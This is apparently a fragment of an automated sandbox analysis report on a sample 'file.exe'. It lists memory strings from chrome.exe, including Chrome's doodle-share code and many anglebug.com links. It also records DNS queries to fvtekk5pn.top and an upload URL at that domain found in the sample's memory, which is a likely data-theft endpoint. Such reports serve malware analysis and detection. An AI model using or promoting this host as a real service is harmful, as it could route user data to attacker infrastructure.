Source: chrome.exe, 00000004.00000003.2386169962.00001D400040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2386125814.00001D4000F80000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2385855317.00001D4000FA8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
Source: chrome.exe, 00000004.00000003.2386169962.00001D400040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2386125814.00001D4000F80000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2385855317.00001D4000FA8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
Source: chrome.exe, 00000004.00000002.4180753767.00001D40006EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.4180753767.00001D40006F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/: equals www.youtube.com (Youtube)
Source: chrome.exe, 00000004.00000002.4180753767.00001D40006EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.4180753767.00001D40006F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/J equals www.youtube.com (Youtube)
Source: chrome.exe, 00000004.00000002.4179797184.00001D40004A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: global traffic DNS traffic detected: DNS query: home.fvtekk5pn.top
Source: global traffic DNS traffic detected: DNS query: fvtekk5pn.top
Source: global traffic DNS traffic detected: DNS query: www.google.com
Source: global traffic DNS traffic detected: DNS query: apis.google.com
Source: global traffic DNS traffic detected: DNS query: play.google.com
Source: unknown HTTP traffic detected: POST /log?format=json&hasfast=true HTTP/1.1Host: play.google.comConnection: keep-aliveContent-Length: 912sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Type: application/x-www-form-urlencoded;charset=UTF-8Accept: */*Origin: chrome-untrusted://new-tab-pageX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: file.exe, 00000000.00000002.4163006440.000000000140E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: HTTP://fvtekk5pn.top/v1/upload.php
Source: file.exe, 00000000.00000003.1680186508.0000000007242000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.4159253473.00000000007E3000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://.css
Source: file.exe, 00000000.00000003.1680186508.0000000007242000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.4159253473.00000000007E3000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://.jpg
Source: chrome.exe, 00000004.00000003.2381312046.00001D40007B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2381240906.00001D4000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2367233548.00001D4000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.4180596501.00001D40006A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/1423136
Source: chrome.exe, 00000004.00000002.4183076354.00001D4000BDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2598141832.00001D4000BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2381312046.00001D40007B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2381240906.00001D4000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2832452770.00001D4000BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2367233548.00001D4000380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/2162
Source: chrome.exe, 00000004.00000002.4183076354.00001D4000BDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2598141832.00001D4000BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2381312046.00001D40007B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2381240906.00001D4000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2832452770.00001D4000BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2367233548.00001D4000380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/2517
Source: chrome.exe, 00000004.00000002.4179797184.00001D40004A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2381312046.00001D40007B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2381240906.00001D4000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2367233548.00001D4000380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/2970
Source: chrome.exe, 00000004.00000002.4183076354.00001D4000BDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2598141832.00001D4000BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2381312046.00001D40007B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2381240906.00001D4000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2832452770.00001D4000BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2367233548.00001D4000380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3078
Source: chrome.exe, 00000004.00000002.4182678012.00001D4000B00000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2381312046.00001D40007B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2381240906.00001D4000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2367233548.00001D4000380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3205
Source: chrome.exe, 00000004.00000002.4183076354.00001D4000BDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2598141832.00001D4000BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2381312046.00001D40007B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2381240906.00001D4000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2832452770.00001D4000BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2367233548.00001D4000380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3206
Source: chrome.exe, 00000004.00000002.4183076354.00001D4000BDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2598141832.00001D4000BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2381312046.00001D40007B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2381240906.00001D4000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2832452770.00001D4000BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2367233548.00001D4000380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3452
Source: chrome.exe, 00000004.00000002.4179797184.00001D40004A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2381312046.00001D40007B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2381240906.00001D4000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2367233548.00001D4000380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3498
Source: chrome.exe, 00000004.00000002.4183076354.00001D4000BDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2598141832.00001D4000BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2381312046.00001D40007B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2381240906.00001D4000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2832452770.00001D4000BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2367233548.00001D4000380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3502
Source: chrome.exe, 00000004.00000002.4183076354.00001D4000BDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2598141832.00001D4000BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2381312046.00001D40007B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2381240906.00001D4000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2832452770.00001D4000BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2367233548.00001D4000380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3577
Source: chrome.exe, 00000004.00000002.4183076354.00001D4000BDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2598141832.00001D4000BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2381312046.00001D40007B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2381240906.00001D4000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2832452770.00001D4000BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2367233548.00001D4000380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3584
Source: chrome.exe, 00000004.00000002.4179797184.00001D40004A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.4183076354.00001D4000BDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2598141832.00001D4000BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2381312046.00001D40007B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2381240906.00001D4000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2832452770.00001D4000BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2367233548.00001D4000380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3586
Source: chrome.exe, 00000004.00000003.2367233548.00001D4000380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3623
Source: chrome.exe, 00000004.00000003.2367233548.00001D4000380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3624
Source: chrome.exe, 00000004.00000003.2367233548.00001D4000380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3625
Source: chrome.exe, 00000004.00000002.4183076354.00001D4000BDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2598141832.00001D4000BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2381312046.00001D40007B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2381240906.00001D4000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2832452770.00001D4000BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2367233548.00001D4000380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3832
Source: chrome.exe, 00000004.00000002.4183076354.00001D4000BDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2598141832.00001D4000BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2381312046.00001D40007B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2381240906.00001D4000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2832452770.00001D4000BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2367233548.00001D4000380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3862
Source: chrome.exe, 00000004.00000002.4183076354.00001D4000BDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2598141832.00001D4000BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2381312046.00001D40007B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2381240906.00001D4000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2832452770.00001D4000BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2367233548.00001D4000380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3965
Source: chrome.exe, 00000004.00000002.4177457082.00001D400000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.4183076354.00001D4000BDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2598141832.00001D4000BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2381312046.00001D40007B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2381240906.00001D4000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2832452770.00001D4000BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2367233548.00001D4000380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3970
Source: chrome.exe, 00000004.00000002.4179797184.00001D40004A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2381312046.00001D40007B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2381240906.00001D4000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2367233548.00001D4000380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/4324
Source: chrome.exe, 00000004.00000002.4179797184.00001D40004A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2381312046.00001D40007B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2381240906.00001D4000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2367233548.00001D4000380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/4384
Source: chrome.exe, 00000004.00000002.4183076354.00001D4000BDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2598141832.00001D4000BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2381312046.00001D40007B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2381240906.00001D4000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2832452770.00001D4000BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2367233548.00001D4000380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/4405
Source: chrome.exe, 00000004.00000002.4183076354.00001D4000BDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2598141832.00001D4000BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2381312046.00001D40007B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2381240906.00001D4000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2832452770.00001D4000BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2367233548.00001D4000380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/4428
Source: chrome.exe, 00000004.00000002.4179797184.00001D40004A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.4183076354.00001D4000BDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2598141832.00001D4000BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2381312046.00001D40007B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2381240906.00001D4000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2832452770.00001D4000BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2367233548.00001D4000380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/4551
Source: chrome.exe, 00000004.00000002.4183076354.00001D4000BDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2598141832.00001D4000BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2381312046.00001D40007B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2381240906.00001D4000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2832452770.00001D4000BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2367233548.00001D4000380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/4633
Source: chrome.exe, 00000004.00000002.4183076354.00001D4000BDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2598141832.00001D4000BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2381312046.00001D40007B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2381240906.00001D4000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2832452770.00001D4000BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2367233548.00001D4000380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/4722
Source: chrome.exe, 00000004.00000002.4183076354.00001D4000BDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2598141832.00001D4000BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2381312046.00001D40007B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2381240906.00001D4000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2832452770.00001D4000BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2367233548.00001D4000380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/4836
Source: chrome.exe, 00000004.00000002.4183076354.00001D4000BDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2598141832.00001D4000BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2381312046.00001D40007B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2381240906.00001D4000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2832452770.00001D4000BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2367233548.00001D4000380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/4901
Source: chrome.exe, 00000004.00000002.4183076354.00001D4000BDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2598141832.00001D4000BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2381312046.00001D40007B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2381240906.00001D4000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2832452770.00001D4000BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2367233548.00001D4000380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/4937
Source: chrome.exe, 00000004.00000003.2381312046.00001D40007B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2381240906.00001D4000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2367233548.00001D4000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.4180596501.00001D40006A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/5007
Source: chrome.exe, 00000004.00000002.4183076354.00001D4000BDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2598141832.00001D4000BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2381312046.00001D40007B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2381240906.00001D4000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2832452770.00001D4000BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2367233548.00001D4000380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/5055
Source: chrome.exe, 00000004.00000002.4183076354.00001D4000BDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2598141832.00001D4000BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2381312046.00001D40007B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2381240906.00001D4000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2832452770.00001D4000BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2367233548.00001D4000380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/5061
Source: chrome.exe, 00000004.00000002.4183076354.00001D4000BDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2598141832.00001D4000BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2381312046.00001D40007B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2381240906.00001D4000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2832452770.00001D4000BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2367233548.00001D4000380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/5281
Source: chrome.exe, 00000004.00000002.4183076354.00001D4000BDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2598141832.00001D4000BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2381312046.00001D40007B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2381240906.00001D4000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2832452770.00001D4000BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2367233548.00001D4000380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/5371
Source: chrome.exe, 00000004.00000002.4183076354.00001D4000BDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2598141832.00001D4000BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2381312046.00001D40007B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2381240906.00001D4000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2832452770.00001D4000BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2367233548.00001D4000380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/5375
